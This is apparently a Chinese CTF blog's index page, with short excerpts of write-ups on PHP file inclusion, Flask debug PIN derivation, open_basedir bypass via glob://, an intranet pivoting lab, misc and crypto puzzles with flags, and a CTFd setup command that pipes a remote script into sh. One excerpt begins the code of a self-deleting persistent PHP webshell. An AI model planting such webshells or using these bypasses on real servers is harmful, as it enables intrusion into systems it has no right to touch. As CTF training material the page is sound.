常见利用函数1234567include： 找不到被包含的文件时只会产生警告，脚本将继续执行。include_once： 和include()语句类似，唯一区别是如果该文件中的代码已经被包含，则不会再次包含。require： 找不到被包含的文件时会产生致命错误，并停止脚本。require_once： 和require()语句类似，唯一区别是如果该文件中的代码已经被包含，则不会再次包含。readfi

2021年就比完了初赛，但是因为疫情没能办成决赛，今年6月重启了比赛 CryptoCrypto-1base64->base32->base64–>base64 Crypto-2变种凯撒 上图引用的caesar是自定义的模块 1234567891011121314151617181920212223242526272829303132333435363738394041424344

misczip-guessing打开压缩包发现提示password=.......py 进行6位密码爆破，得到密码3a1b6c 解压得到flag flag{fa8d910600a5467d9d2f433f2bba4c80} Spiderman修改高度，发现字符串README：HAHAyoufoundIT binwalk分离出一个带密码的压缩包 压缩包中含有一个名为README.txt的文件将H

ctf平台搭建目前最常见的平台是CTFd和GZCTF CTFd使用帆哥的一键部署脚本（centos7和ubuntu20上测试成功）sh <(curl -s https://raw.githubusercontent.com/pwnthebox/ctfd-auto-deploy/master/install.sh) 2024.5.13帆哥github被封了，重构/优化了一下自动部署

flask在开启debug模式后会启动调试模式，一般为/console，需要正确的PIN码才能进入 python3.8和python3.6生成PIN的算法不同 算法代码在site-packages/werkzeug/debug/__init__.py 需要的信息 代码中 文件中 username getpass.getuser() /etc/passwd mod

open_basedir一般用来限制跨目录读写文件 php绕过open_basedir是一个古老的漏洞，在2009年左右就被提出来了 glob://opendir()函数为打开目录句柄，readdir()函数为从目录句柄中读取条目。 这里结合两个函数来列举根目录中的文件： 1234567$a="glob:///*";if ( $b = opendir($a)

miscSign-inflag{HSC_W3LC0M3} DORAEMON 哆啦A梦把泡好的QR放进口袋后，用六位数字把自己放好了。你能找到它吗？ 压缩包先暴力破解出密码为376852 得到一张图片，发现高度不对劲，增加一点高度，看到破损的二维码把定位符补上，扫码得到flag 汝闻,人言否看到压缩包的50 4B 01 02，但是没找到头，搜了一下发现头被改成了4B 50结尾

使用到的工具kaliburpfirefoxreGeorgproxychainsnmap冰蝎蚁剑 题目描述根据描述得知有两层，因为是demo题目，所以给出了漏洞，降低了难度，实际上的题目漏洞点是不知道的，需要自己发掘 解题第一层apache解析漏洞上传1.php.jpg即可getshell 有了第一台主机的shell后首先要做的就是信息收集了 信息收集首先看ip，网段等信息。。。上来啥命令用不了

不死马一个典型的不死马： 12345678910111213<?php ignore_user_abort(true); set_time_limit(0); unlink(__FILE__); $file = '.l.php'; $code = '<?php if(md5($_GET["pass"])==

摆烂了，没有wp